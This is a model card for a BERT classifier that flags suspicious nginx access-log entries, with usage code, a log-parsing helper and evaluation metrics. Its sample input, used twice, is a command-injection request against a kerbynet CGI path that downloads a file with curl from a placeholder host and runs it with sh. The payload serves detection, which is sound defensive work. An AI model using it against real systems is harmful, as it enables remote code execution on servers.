---
language: en
license: apache-2.0
pipeline_tag: text-classification
---
# Log Inspector
A model trained on nginx access logs to classify each request as suspicious or safe. Based on [bert-base-cased](https://huggingface.co/bert-base-cased).

## How to use
Here is how to use this model to inspect a log entry.

The input text must be formatted as follows:  
`"path: <path>; ref:<referrer>; ua:<user agent>;"`
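As a rough sketch, the input string could be built from a raw log line like this. The helper names `format_log` and `from_combined_line` are hypothetical, and the regular expression assumes nginx's default `combined` log format; adjust it if your `log_format` differs.

```python
import re

# Assumption: logs use nginx's default "combined" format.
COMBINED_LOG = re.compile(
    r'^\S+ \S+ \S+ \[[^\]]+\] '               # client, ident, user, time
    r'"\S+ (?P<path>.*?)(?: HTTP/[\d.]+)?" '   # request line: method, URI, protocol
    r'\d{3} \S+ '                              # status, bytes sent
    r'"(?P<ref>[^"]*)" "(?P<ua>[^"]*)"$'       # referrer, user agent
)


def format_log(path, referrer="-", user_agent="-"):
    """Build the input string in the layout shown above."""
    return f"path: {path}; ref:{referrer}; ua:{user_agent};"


def from_combined_line(line):
    """Convert one combined-format line, or return None if it does not match."""
    match = COMBINED_LOG.match(line.strip())
    if match is None:
        return None
    return format_log(match["path"], match["ref"], match["ua"])
```

The resulting string can then be passed to the model as shown in the examples below.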

```python
>>> from transformers import pipeline
>>> inspector = pipeline('text-classification', model="u-haru/log-inspector")
>>> inspector('path: /cgi-bin/kerbynet?Section=NoAuthREQ&Action=x509List&type=*";cd /tmp;curl -O http://O.O.O.O/zero;sh zero;"; ref:-; ua:-;')
[{'label': 'LABEL_0', 'score': 0.9999788999557495}]
```
`LABEL_0` (class 0) marks a suspicious log; `LABEL_1` (class 1) marks a safe log.
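If readable names are preferable to `LABEL_0` and `LABEL_1`, the pipeline output can be post-processed. A minimal sketch, where `LABEL_NAMES` and `describe` are hypothetical names introduced only for illustration:

```python
# Mapping taken from the class description above.
LABEL_NAMES = {"LABEL_0": "suspicious", "LABEL_1": "safe"}


def describe(results):
    """Turn pipeline output into (readable label, score) pairs."""
    return [(LABEL_NAMES.get(r["label"], r["label"]), r["score"]) for r in results]
```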

With Simple Transformers:
```python
>>> import torch
>>> from simpletransformers.classification import ClassificationModel
>>> # Use the GPU only when one is available.
>>> model = ClassificationModel('bert', "u-haru/log-inspector", num_labels=2, use_cuda=torch.cuda.is_available())
>>> predictions, raw_outputs = model.predict(['path: /cgi-bin/kerbynet?Section=NoAuthREQ&Action=x509List&type=*";cd /tmp;curl -O http://O.O.O.O/zero;sh zero;"; ref:-; ua:-;'])
>>> print(predictions)
[0]
```

Training and evaluation:
```python
>>> import pandas as pd
>>> import torch
>>> from simpletransformers.classification import ClassificationModel
>>> model = ClassificationModel('bert', "u-haru/log-inspector", num_labels=2, use_cuda=torch.cuda.is_available())
>>> # Each row is [text, label]: 0 = suspicious, 1 = safe.
>>> data = [["Suspicious log",0],["Safe log",1]]
>>> df = pd.DataFrame(data, columns=["text", "labels"])

>>> model.train_model(df)
>>> result, model_outputs, wrong_predictions = model.eval_model(df)
>>> print(result)
{'mcc': 1.0, 'tp': 1, 'tn': 1, 'fp': 0, 'fn': 0, 'auroc': 1.0, 'auprc': 1.0, 'eval_loss': 1.8238850316265598e-05}
```

I trained the model on 9,500 access logs. The evaluation scores are:
```json
{"mcc": 0.993114718313972, "tp": 1639, "tn": 729, "fp": 0, "fn": 7, "auroc": 0.9994166345815686, "auprc": 0.9997937194890235, "eval_loss": 0.020282083051662583}
```
Evaluation on 10,000 logs:
```json
{"mcc": 0.8494104528008076, "tp": 9964, "tn": 26, "fp": 0, "fn": 10, "auroc": 0.9999845752803442, "auprc": 0.9999999597891697, "eval_loss": 0.0058870489358901976}
```
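
To relate the `mcc` value to the confusion counts, the sketch below recomputes it with the standard binary Matthews correlation coefficient formula. The function name `confusion_metrics` is hypothetical, and it assumes class 1 is treated as the positive class, following the usual scikit-learn convention.

```python
import math


def confusion_metrics(tp, tn, fp, fn):
    """Derive accuracy, precision, recall, and MCC from confusion counts."""
    total = tp + tn + fp + fn
    denom = math.sqrt((tp + fp) * (tp + fn) * (tn + fp) * (tn + fn))
    return {
        "accuracy": (tp + tn) / total if total else 0.0,
        "precision": tp / (tp + fp) if tp + fp else 0.0,
        "recall": tp / (tp + fn) if tp + fn else 0.0,
        # MCC = (tp*tn - fp*fn) / sqrt((tp+fp)(tp+fn)(tn+fp)(tn+fn))
        "mcc": (tp * tn - fp * fn) / denom if denom else 0.0,
    }


# Counts from the 10,000-log evaluation above.
metrics = confusion_metrics(tp=9964, tn=26, fp=0, fn=10)
print(metrics)
```

On the 10,000-log set, accuracy is 0.999 while MCC is roughly 0.849. The gap comes from class imbalance: only 26 logs fall in the negative class, so the 10 misclassified logs weigh heavily on MCC.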

## Training
The source code is available at [github.com/u-haru/log-inspector](https://github.com/u-haru/log-inspector).